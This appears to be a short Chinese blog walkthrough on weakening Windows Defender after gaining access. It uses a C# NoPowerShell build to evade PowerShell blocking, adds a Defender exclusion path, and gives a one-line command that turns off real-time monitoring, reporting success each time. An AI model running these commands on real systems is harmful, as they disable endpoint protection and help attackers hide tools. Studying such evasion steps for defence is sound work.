添加排除项
首先我们看到只有一个排除选项
上传C#版本的nopowershell,绕过拦截powershell进程
Add-MpPreference -ExclusionPath “C:\ttt\”
执行
发现已经填入成功
关闭windows defender
$preferences = Get-MpPreference;Set-MpPreference -DisableRealtimeMonitoring (!$preferences.DisableRealtimeMonitoring)
开启状态
执行
发现windows defender已关闭
若有收获,就点个赞吧
0 人点赞
